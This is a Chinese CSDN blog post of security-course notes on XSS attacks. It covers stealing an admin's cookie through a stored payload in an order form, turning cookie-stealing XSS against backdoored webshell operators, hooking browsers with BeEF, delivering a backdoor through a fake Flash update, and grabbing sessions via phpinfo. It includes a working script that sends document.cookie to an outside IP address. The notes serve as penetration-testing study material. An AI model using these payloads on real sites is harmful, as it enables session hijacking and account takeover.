[小迪安全25-26天]xss

最新推荐文章于 2024-04-14 22:38:53 发布
最新推荐文章于 2024-04-14 22:38:53 发布
阅读量394 收藏 3
点赞数 2
分类专栏: 小迪安全笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/117134382
版权

订单cookie窃取和shell箱子反杀

通过提交订单的方式植入xss来获取网站管理员cookie
在这里插入图片描述
在这里插入图片描述

简单测试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

窃取cookie

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
https://www.postman.com/downloads/下载postman
在这里插入图片描述
在这里插入图片描述

本地构造实现xss攻击1

本地服务器端39.96.44.170 文件jieshou.php在这里插入图片描述

<script>
    new Image().src =
        "http://39.96.44.170/jieshou.php?c=" + encodeURI(document.cookie);
</script>

在这里插入图片描述

在这里插入图片描述

方法2

本地加载js脚本

在这里插入图片描述
在这里插入图片描述

webshell沙箱反杀

就是使用别人的webshell来进行获取服务器shell,但获取shell后webshell存在的恶意代码就会把网站信息和webshell密码,和用户名发到webshell的原主人来进行信息收集,通过大量获取的网站shell来进行贩卖,而使用webshell的人就成打工仔
反杀的意思就是像上面的窃取cookie道理一样通过向webshell的代码中插入窃取cookie的代码,当webshell 原注入查看沙箱时就会触发xss窃取cookie来达到反客为主

在这里插入图片描述
webshell 中的恶意代码
把网站信息发送到指定地址
在这里插入图片描述
成功发送到沙箱

反杀操作

webshell中的恶意代码
在这里插入图片描述
通过访问webshll来植入xss代码窃取cookie
在这里插入图片描述
在这里插入图片描述
殊不知cooKie已被窃取
在这里插入图片描述
登录沙箱后台
在这里插入图片描述

演示存在后门的大马

通过打开webshell进行抓包测试发现向恶意网站发送信息
在这里插入图片描述
发送的代码
在这里插入图片描述
内容为网站地址和webshell密码

beef结合xss攻击

启动beef在这里插入图片描述
在这里插入图片描述
后台管理员查看订单触发xss
成功上线在这里插入图片描述
在这里插入图片描述

社工攻击(利用flash更新)
利用模拟flash更新向客户端发送请求,来实现下载后门在这里插入图片描述
客户端显示
在这里插入图片描述
点击就下载后门

获取session思路

因为当访问php探针时就会携带session
在这里插入图片描述
如果能利用xss让管理员页面跳转到phpinfo()页面,通过返回页面源码就能窃取session
利用beef进行页面跳转
在这里插入图片描述
获取页面源码在这里插入图片描述
获取源码中的cookie和session
在这里插入图片描述

道长在此
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
利用Express模拟web安全---xss的攻与防
01-26
Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的, 还有另外一种...
安全学习笔记--第26天:web漏洞-xss跨站之订单及shell箱子反杀记
zr1213159840的博客
01-03 516
xss平台及工具使用 postman可以通过获取的cookie登录网站的后台 beef工具必须在linux中才可以使用。 xss经典应用案例测试 webshell后门中的后门 箱子返回的代码中添加后门,然后获取到箱子的cookie后台 session与cookie获取问题 document.cookie等 代码中通过这个函数来获取cookie 配合读取phpinfo等源码信息等 案例演示 某营销订单系统化xss盲打_平台 某shell箱子系统xss盲打_工具 其他参考应用案例-后台权限维持 工具http/.
安全--xss跨站脚本攻击
wcwdnmdnmd的博客
08-24 669
xss跨站脚本攻击xss原理 xss原理 它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实 施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。 ...
xss攻击原理与解决方法
最新发布
套路猿的博客
04-14 7万+
概述XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等,有时候还和其他攻击方式同时实施比如SQL注入攻击服务器和数据库、Click劫持、相对链接劫持等实施钓鱼,它带来的危害是巨大的,是web安全的头号大敌。攻击的条件实施
web漏洞“小安全课堂笔记”XSS
weixin_42902126的博客
03-25 1448
安全课堂笔记——XSS跨站脚本攻击思维导图XSS跨站漏洞产生原理,危害,特点?XSS跨站漏洞分类:反射(非持续型),存储(持续型),DOM反射型存储型DOM型XSS 常规攻击手法平台工具cookie sessioncookie盗取成功条件session获取XSS适用环境绕过httponlyWAF拦截 思维导图 XSS跨站漏洞产生原理,危害,特点? XSS 属于被动式的攻击。攻击者先构造一个跨站页面,利用script、、等各种方式使得用户浏览这个页面时,触发对被攻击站点的http 请求。此时,如果被攻击
[小安全28天]xss绕过
weixin_54252904的博客
05-30 392
xss绕过\号和垃圾数据更换提交方式使用网站识别的加密方式绕过xssfuzzfuzz字典xsstrike工具 删减操作 进行一些删减 删减不能访问 使用单引号 继续填充垃圾数据 添加斜杆和垃圾数据没有绕过 但在后面添加#号成功绕过,目的是防止继续匹配,注释作用 \号和垃圾数据 \号在javascript中相当于结束标志,目的是让安全狗不匹配后面的数据 垃圾数据是干扰作用 更换提交方式 post提交绕过 使用网站识别的加密方式绕过 xssfuzz http://xs
第26天-WEB漏洞-XSS跨站之订单及Shell箱子反杀记
MCTSOG的博客
03-11 1388
思维导图 xss漏洞存在的地方 留言板 评论区 订单系统 意见反馈等 #cookie session 用户凭据:通过凭据可以判断对方身份信息 cookie 存储本地 存活时间较长 小中型 session 会话 存储服务器 存活时间较短 大型 演示案例: 某营销订单系统 XSS 盲打_平台 前端订单界面 后端管理界面 演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息! 使用xss平台/工具 自己编写代码接收 某 Shell 箱子系统 XSS 盲打_工具 跨站漏
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
10-18
007-Web安全基础3---XSS漏洞(CISP-PTE).pptx
xss-labs小游戏
01-25
20关的xss游戏题,每一位xss大佬都做过哟,放在网站根目录即可纵享丝滑,快来尝试吧!
Web安全XSS攻击与防御小结
02-23
跨站脚本攻击(CrossSiteScripting),缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起...
2021小web安全笔记全套.zip
08-16
安全圈子知名讲师 小 2021最新教学的课堂笔记 教程还是挺不错的,很好入门。教程也比较新,有新的waf绕过方法以及代码审计,还有新的工具和渗透思维。
[小安全25-26天]xsslab
weixin_54252904的博客
05-23 330
1.简单过关 2.闭合"> 3.过滤" <>
WEB漏洞-XSS跨站之订单及Shell箱子反杀
xhscxj的博客
01-23 469
shell箱子 很多人在网上发布大马,他们在大马中写入了后门。当你成功把有后门的大马上传到目标网站上时,大马就会把该网站的url以及密码发送给在大马留过后门的人。 $_SERVER['HTTP_HOST']//获取当前的url $_SERVER['PHP_SELF']//获取当前访问的文件路径 例子:(留后门的方式有很多,也有可能加密,这里只是举一个例子) 因为代码<script src='http://www.xxx.com/index.php?url=$url&pass=$passwor
XSS跨站订单和shell反杀
qq_50613938的博客
11-03 246
Webshell箱子:相信很多人都使用过asp或者php的大马,一般这些大马的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的shell发送到他的服务器,就相当于你给别人打工。 废话不多说,实战来演示一下webshell箱子: 1、首先我们搭建一下asp服务器来放置webshell箱子(后门) 2、然后进入我们的后门网页,默认账号密码都是admin 3、随意构造一个一句话木马,然后再一句话木马代码里插入javascript语句来制作后门(调用webshel
学习笔记- 第02天:基础入门-数据包拓展
weixin_48800344的博客
09-01 1070
网站解析对应** http/s数据包(没经过代理服务器的) 客户端(游览器)->服务器(web server) request 请求 客户端(游览器)<-服务器(web server) response 响应 #request 请求数据包 #response 返回数据包 经过代理服务器 客户端->代理服务器(proxy server)->服务端 客户端<-代理服务器(proxy server)<-服务端 #proxy server 代理服务器 因为
安全笔记01
weixin_45382875的博客
06-24 607
安全01 2021/6/22 域名 域名注册商:阿里云、万网、 一级域名:baidu.com 二级域名:news.baidu.com 三/多级域名:shehui.news.baidu.com 域名与安全测试:如果一级域名不能突破,可以从其它级域名下手 DNS与Host DNS 域名系统(服务)协议   是一种分布式网络目录服务,主要用域名与IP地址的相互转换,以及控制因特网的电子邮件的发送。   域名系统。用来把机器名字转换成IP地址。简单来说,全球有很多域名服务器,用来存储从域名到IP地址的映射。
[小安全20-23天]upload-laps
weixin_54252904的博客
05-16 330
upload-lab 1.前端验证 1.禁用本地js 火狐禁用js F12->设置->禁用javascript IE禁用js https://jingyan.baidu.com/article/2a138328b1f0ee074a134f90.html 2. burpsuite抓包改包 3. 谷歌覆盖 拷贝页面源码 通过本地新建html文件把源码拷贝进去 把js代码删除并修改或添加action 把action修改为页面上传文件的后端代码文件 成功上传 执行成功 2
XSS详细讲解
qq_44857938的博客
06-18 1万+
XSS 1.XSS简介 (1)XSS简介 XSS作为OWASP TOP 10之一。 XSS中文叫做跨站脚本攻击(Cross-site scripting),本名应该缩写为CSS,但是由于CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS(跨站脚本攻击)主要基于javascript(js)来完成恶意的攻击行为。 XSS是一种经常出现在web应用中的计算机大全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站对用
-xmx -xms -xmn -xss
07-08
您的第一个问题是关于 JVM 的参数,分别是 -Xmx、-Xms、-Xmn 和 -Xss- -Xmx:指定 JVM 的最大堆内存大小,用于存放对象实例和数组。例如,-Xmx2g 将最大堆内存设置为 2GB。 - -Xms:指定 JVM 的初始堆内存大小,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值